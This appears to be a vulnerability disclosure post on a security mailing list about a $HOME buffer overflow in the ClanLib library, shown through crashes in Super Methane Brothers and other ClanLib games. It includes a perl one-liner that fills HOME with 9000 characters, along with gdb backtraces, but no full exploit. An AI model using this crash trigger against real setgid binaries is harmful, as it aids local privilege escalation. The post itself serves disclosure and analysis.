Clanlib overflow / Super Methane Brothers overflow

[KF <dotslash () snosoft com>]

Charles stayed up all night and found a hole in Eterm so I felt 
obligated to stay up
all night and find something else wrong on my box too. In doing so I 
found an overflow
in a game included with Mandrake 8.1 called Super Methane Brothers. 
$HOME=<bof here>
then run /usr/games/methane. Inturn that caused me to find an overflow 
in ClanLib. So thanks
for staying up late last night core!

This was all tested against some rpms made from the mandrake src with 
"rpm --rebuild"
libclanlib0-0.4.4-28mdk
libclanlib0-magick-0.4.4-28mdk
clanlib-0.4.4-28mdk
libclanlib0-gl-0.4.4-28mdk
libclanlib0-png-0.4.4-28mdk
libclanlib0-devel-0.4.4-28mdk
libclanlib1-0.5.1-4mdk
libclanlib0-mikmod-0.4.4-28mdk

It looks like the buffer overflow in /usr/games/methane is a library 
Overflow in clanlib
instead. I checked some other clanlib based games to proove this.

[root@linuxppc root]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc root]# /usr/games/methane
Super Methane Brothers
Licensed using the GNU General Public License Version 2
http://www.methane.fsnet.co.uk
...
This game requires ClanLib (v0.5.0) and Hermes (v1.3.3) 
http://clanlib.org/hermes
(High Scores written to /var/lib/games/methanescores)
Segmentation fault

[root@linuxppc root]# ls -al /usr/games/methane
-rwxr-sr-x    1 root     games     1978056 Nov 13 06:36 /usr/games/methane*

This was default on my intel Mandrake 8.1 box. I overwrote edx and ecx 
with my own data.
I don't do intel so I didn't try any further. I got the packages for ppc 
and it was no fun
to play with so I decided to look at some other clanlib based games to 
at least verify the
library issue. I think the below link has info on the function causing 
the problem.

http://dark.x.dtu.dk/~sphair/cvs/Libs/ClanLib-0.5/Documentation/Reference/html/CL_SetupDisplay.html#2325

Here are some more examples of the clanlib overflow.

StarWar-0.0.1d.tar.gz
[root@linuxppc StarWar-0.0.1]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc StarWar-0.0.1]# src/starwar
Segmentation fault (core dumped)

This is the same place methane cored on my intel box...
#0  0x0fc81b78 in strcpy () from /lib/libc.so.6
(gdb) bt
#0  0x0fc81b78 in strcpy () from /lib/libc.so.6
#1  0x0ff89554 in FileConfig::LocalConfigFile () from 
/usr/lib/libclanCore.so.0
#2  0x0ff87014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
#3  0x0ff83b28 in CL_SetupCore::init_display () from 
/usr/lib/libclanCore.so.0
#4  0x1000d37c in InitDisplayApp::main ()
#5  0x0ff85270 in main () from /usr/lib/libclanCore.so.0
#6  0x0fc1eb90 in __libc_start_main () from /lib/libc.so.6

kwirk-0.0.16.tar.gz
[root@linuxppc Kwirk]# ./kwirk
Segmentation fault (core dumped)
(gdb)
#0  0x0fd36b78 in strcpy () from /lib/libc.so.6
#1  0x0fef0554 in FileConfig::LocalConfigFile () from 
/usr/lib/libclanCore.so.0
#2  0x0feee014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
#3  0x0feeab28 in CL_SetupCore::init_display () from 
/usr/lib/libclanCore.so.0
#4  0x1001e8f4 in TKwirk::init_modules (this=0x10054104) at kwirk.cpp:24
#5  0x0feec1fc in main () from /usr/lib/libclanCore.so.0
#6  0x0fcd3b90 in __libc_start_main () from /lib/libc.so.6

clankanoid-0.1.tgz
[root@linuxppc clanka]# ./clankanoid
Segmentation fault (core dumped)

I think you get the idea.
I would Imagine about any game on http://www.clanlib.org/links.html 
would have this issue also.
Im sure a few clanlib games are suid like the one that came with 
Mandrake 8.1 (methane)
-KF